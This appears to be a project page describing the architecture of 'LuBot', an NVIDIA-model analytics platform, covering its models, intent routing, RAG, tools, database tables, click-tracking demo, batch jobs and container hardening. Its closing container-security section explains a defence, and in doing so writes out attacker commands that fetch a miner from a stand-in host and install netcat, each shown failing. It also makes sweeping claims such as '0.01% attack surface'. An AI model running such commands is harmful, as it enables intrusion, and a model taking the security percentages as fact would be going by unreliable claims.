Claude Claude Code

LuBot Architecture

Enterprise AI Self-Learning Analytics Platform - 100% NVIDIA Powered

122,728 Lines of Code
273 Source Files
36 Database Tables
42 API Endpoints
18 Batch Workers
28 AI Tools
🛡️ 99% Secured Distroless Containers

LuBot AI Models — 6 NVIDIA Models

☁️ Cloud Models (via NVIDIA NIM API)

NVIDIA Nemotron Ultra
253B
Intent Routing • Query Enrichment
Document QA • PhD-Level Analysis
NVIDIA Nemotron Nano
8B
Code Generation • Fast Analytics
Simple Queries • 50K tok/s
NVIDIA Nemotron Vision
12B VL
Image & Screenshot Analysis
Multi-Modal Understanding
NVIDIA NV-EMBEDQA-E5
v5
1024-dim Semantic Embeddings
Intent Matching • FAISS Search
NVIDIA Nemotron-3-Nano
30B
1M Context • On-Premise GPU
Self-Hosted RTX 4090
NVIDIA Nemotron-mini
2.7B
Ultra-Light • Real-Time Inference
Self-Hosted RTX 4090 via Ollama

🏗️ Infrastructure

NVIDIA NIM API
Cloud Inference Endpoint
integrate.api.nvidia.com/v1
NVIDIA RTX 4090
On-Premise GPU • 24GB VRAM
Nemotron-3-Nano + Nemotron-mini
AdalFlow
LLM Orchestration Framework
AI Agent Pipeline Engine
Groq (Fallback)
<1%
Emergency Fallback Only

🧬 Self-Learning Architecture

LuBot: A Self-Learning AI Agent

LuBot combines proven engineering patterns into a unique self-learning analytics platform. Through 18 nightly batch workers, 36 database tables tracking user behavior, and adaptive learning systems, LuBot becomes smarter over time - learning your preferences, optimizing response routes, and personalizing insights based on your interaction patterns. Every query makes LuBot better at serving you.

🔄 Request Flow Architecture

User Query
Query Enrichment
(253B Rewrite)
Intent Classifier
(4-Tier)
Route Decision
(253B)
Tool Execution
Grounded Pipeline
Response

🧠 RAG & Embedding Pipeline — NVIDIA Powered

NVIDIA NV-EmbedQA-E5-V5
1024-dim
Semantic Embedding Model • 335M Parameters
Powers all vector search, intent matching & memory retrieval
Text Input
NVIDIA Embed
(1024-dim Vector)
FAISS Index
(Vector Store)
Retrieved Context
(Top-K Similar)
Augmented LLM
(Grounded Response)

6 Embedding-Powered Features

📄 Document RAG
Uploaded files chunked & embedded into 1024-dim vectors. FAISS retrieves relevant passages to ground LLM responses in real data.
🎯 Tier 2 Intent Matching
User queries embedded & compared via cosine similarity to known intent vectors. Semantic routing without LLM calls.
💬 Conversation Embeddings
Every conversation indexed as vectors. Enables semantic memory search across all past interactions.
🔗 Semantic Clustering
Nightly batch worker groups similar queries by vector proximity. Discovers usage patterns automatically.
📚 Few-Shot RAG Learning
Retrieves similar past Q&A pairs as few-shot examples. Response quality improves with every conversation.
🔍 FAISS Vector Search
Facebook AI Similarity Search engine. Sub-millisecond approximate nearest neighbor across all vector indexes.

🎯 The LuBot Cascade — 4-Tier Intent Routing

If the agent can figure out what the user wants without calling an LLM, it should. Each stage tries the cheapest method first and only escalates when needed — 95% of routing decisions cost zero LLM tokens.

Tier 0 - Deterministic Detection 0ms - Regex
PhD Analysis Correlation Concentration Anomaly Web Search Fast-Path
Tier 1 - Core Intents (80% of queries) 0ms - Pattern Match
GREETING IDENTITY CAPABILITIES MEMORY_RECALL MEMORY_UPDATE DATA_MODE_SWITCH DATA_QUERY WEB_SEARCH DOCUMENT_QA PREDICTION DOCUMENT_GENERATION DATA_LIBRARY GENERAL
Tier 2 - NVIDIA Embeddings (15% of queries) 5ms - Semantic
ADVICE_REQUEST FOLLOWUP CLARIFICATION DEEP_DIVE COMPARISON
Tier 3 - NVIDIA LLM Fallback (5% of queries) 100ms - LLM
Ambiguous Queries Complex Multi-Intent Edge Cases

3-Tier Response System (Smart Model Routing)

Routes queries to the optimal NVIDIA model based on complexity.

Tier 0 - DIRECT (No LLM Needed) 0ms - Template
Criteria: Simple aggregation (COUNT, SUM, AVG) with 1 row result
user_generic_count user_generic_total user_generic_avg user_generic_min user_generic_max
Example: "How many employees?" → "You have 320 employees"
Tier 1 - ENHANCED (Nemotron Nano 8B) 50ms - 50K tok/s
Criteria: Medium complexity, GROUP BY with 2-10 rows, basic analysis
Tables with insights Grouped summaries Top N queries Basic comparisons
Example: "Revenue by department" → Table + "Sales is highest at $2M"
Tier 2 - FULL PhD (Nemotron Ultra 253B) 500ms - 253B params
Criteria: Statistical analysis OR >10 rows requiring deep insights
correlation concentration simpsons_paradox outliers trend comparison
Example: "Correlation between sales and marketing?" → "Pearson r=0.95, p<0.001 - strong positive"
🔄 Routing Flow
Query → ResponseTierRouter.get_response_tier() → Tier 0 | Tier 1 | Tier 2 → LLMRouter → NVIDIA Model

🛠️ AI Tools & Capabilities (28)

📊 Data & Query Tools

1. SQL Query Engine
Safe SQL execution with injection protection, schema-aware queries
2. SQL Template Matcher
Pattern matching for SQL generation, 30+ templates
3. Schema Extractor
Auto-detect database schema, column mapping
4. Data Analyzer
Metric summaries, trend detection, dimension analysis

📈 Visualization Tools

5. Chart Generator
15+ Plotly chart types: bar, line, pie, scatter, heatmap, etc.
6. Chart Preference Parser
Learn user preferences, personalized defaults
7. Report Generator
PDF, Excel, Word export with charts and insights
8. Report Intelligence
Executive summaries, traffic insights, recommendations

🔬 PhD-Level Intelligence (7 Analyzers)

9. Correlation Analysis
Pearson/Spearman correlation, statistical significance
10. Concentration Analysis
Pareto analysis, Gini coefficient, HHI index
11. Simpson's Paradox
Mix shift detection, segment-level reversal analysis
12. Anomaly Detection
Statistical outliers, Z-score, IQR methods
13. Drivers Analysis
Sensitivity analysis, impact attribution
14. Scenario Analysis
What-if projections, growth scenarios
15. Timeseries Analysis
7 sub-analyzers: trend, seasonality, volatility, momentum
16. Prediction Tools
Prophet forecasting, trend analysis, future projections

🧠 AI Processing Pipeline

17. Grounded Pipeline
20-stage response generation with fact extraction
18. Code Interpreter
Python execution, 20+ analysis templates
19. LLM Router
Intelligent model routing, Nano vs Ultra selection
20. Response Tier Router
Complexity detection, tier assignment

🌐 External Integration Tools

21. Web Search
Real-time web queries with source citations
22. Document RAG
PDF/Word processing, FAISS vector search, Q&A
23. Image Analysis
Vision model integration, multi-modal analysis
24. NVIDIA Embeddings
NV-EMBEDQA-E5-v5 for semantic search

💾 Memory & Storage Tools

25. Memory System
Cross-session memory, conversation indexing, FAISS
26. User Context Builder
Personalization, topic ranking, dimension ordering
27. B2 Cold Storage
Hot/cold pattern: PostgreSQL + Backblaze B2
28. Template Learning
Adaptive learning, route weights, preferences

🗄️ Database Schema (36 Tables)

🏛️ Core Foundation
users
chat_sessions
📦 User Data & Storage
user_uploads
user_uploaded_metrics
user_uploaded_rows
user_uploaded_documents
user_document_chunks
user_document_metadata
user_text_extractions
🧠 Memory & Context
conversation_memory
conversation_embedding_log
generated_output_context
user_conversation_insights
📚 Learning & Preferences
user_preferences
user_chart_preferences
user_route_weights
user_web_search_preferences
user_rag_preferences
user_prediction_preferences
user_report_preferences
preference_events
parameter_learning
template_learning_data
📊 Analytics & Tracking
click_logs
daily_click_summary
landing_visits
daily_landing_summary
user_events
interaction_log
message_feedback
chart_data
👥 Profiles & Segmentation
user_data_profiles
user_daily_summary
user_visitor_segments
user_visitor_segmentation_data
completion_queue

🌐 Demo Mode — Live Data from lubobali.com

LuBot's demo mode uses real-time click data from lubobali.com (portfolio site). Visitors generate live analytics data that LuBot can query, visualize, and analyze — no sample data needed.

lubobali.com
tracker.js
POST /api/track-click
Real-time API
click_logs
Neon PostgreSQL
Click Aggregator
12:00 AM ETL
daily_click_summary
Aggregated Metrics
How It Works
1. Collect
lubobali.com tracker.js sends page views, session IDs, time-on-page, and referrer data to LuBot's API in real-time.
2. Process
Click Aggregator ETL runs nightly at 12:00 AM — deduplicates events, computes unique pageviews, and builds daily summaries.
3. Query
Users ask LuBot: "Show me top pages" or "Traffic trends this week" — LuBot queries the live data and generates charts.
Data Tracked: Page Views • Session Duration • Time on Page • Referrer Source • Device/Browser • IP Hash (GDPR-safe)

Nightly Batch Workers (18 Jobs)

12:00 AM
Click Aggregator ETL
12:10 AM
Landing Aggregator ETL
2:00 AM
Route Weights Learning
3:00 AM
Chart Preferences
4:00 AM
Few-Shot RAG Learning
5:00 AM
User Profile Builder
6:00 AM
Data Profile Baselines
6:30 AM
Multi-Tenant Profiles
7:00 AM
GDPR Data Cleanup
7:30 AM
Completion Verification
8:00 AM
Memory Extraction
8:30 AM
Conversation Embeddings
9:00 AM
Semantic Clustering
9:30 AM
Web Search Prefs
10:00 AM
RAG Preferences
10:30 AM
Prediction Prefs
11:00 AM
Report Preferences
11:30 AM
K-Means Segmentation

🔌 API Endpoints (42)

GET/health
GET/health/memory
POST/v1/agent/run
GET/v1/agent/stream
POST/v1/agent/switch-model
GET/v1/agent/current-model
POST/v1/agent/reset-memory
GET/v1/agent/memory-status
POST/api/upload-document
POST/api/upload-data/{user_id}
DELETE/api/users/{id}/files/{name}
GET/api/users/{id}/storage
GET/api/users/{id}/schema
POST/api/users/{id}/data-mode
GET/api/chat-sessions
GET/api/memories
POST/api/interaction
POST/api/feedback
POST/api/analyze-image
GET/api/analytics/topics
POST/api/track-click
POST/api/landing/track
POST/api/landing/update
POST/api/landing/enter
GET/api/segments/chart/{id}
GET/api/chart/{chart_id}
GET/api/download/{file_id}

🌐 External Services

NVIDIA NIM API
6 NVIDIA Models
Ultra 253B, Nano 8B, Vision 12B VL
NV-EMBEDQA-E5-v5 + Self-Hosted
Groq API
Fallback LLM (<1%)
Emergency backup only
Neon PostgreSQL
Primary Database
36 tables, 230MB+
Real-time OLTP
Backblaze B2
Cold Storage
Raw file storage
Cost-effective archive

🛡️ Container Security — Distroless Architecture

Production-grade container hardening following Google, Netflix, and Stripe security patterns. Every LuBot container runs with zero attack surface — no shell, no tools, nothing to exploit.

BEFORE
Standard Alpine Container
/bin/sh
/bin/bash
wget
curl
apt / apk
chmod / rm
93%
Exploitable Attack Surface
AFTER
Distroless Container
App Binary
Runtime Only
No Shell
No wget/curl
No Package Mgr
No File Utils
0.01%
Attack Surface — Hackers Trapped

Defense Layers

Distroless Base Image
Google's gcr.io/distroless — contains only app + runtime, zero OS tools
Non-Root Execution
All containers run as UID 1000 — no privilege escalation possible
Read-Only Filesystem
Immutable container filesystem — nothing can be written or modified
Network Isolation
UFW firewall rules — only ports 80, 443, 22 exposed
What Happens When an Attacker Gets In
$ docker exec container /bin/sh  →  exec failed: no such file or directory
$ wget malware.sh  →  command not found
$ curl evil.com/miner  →  command not found
$ apt install netcat  →  command not found
// Attacker is trapped in an empty room with no tools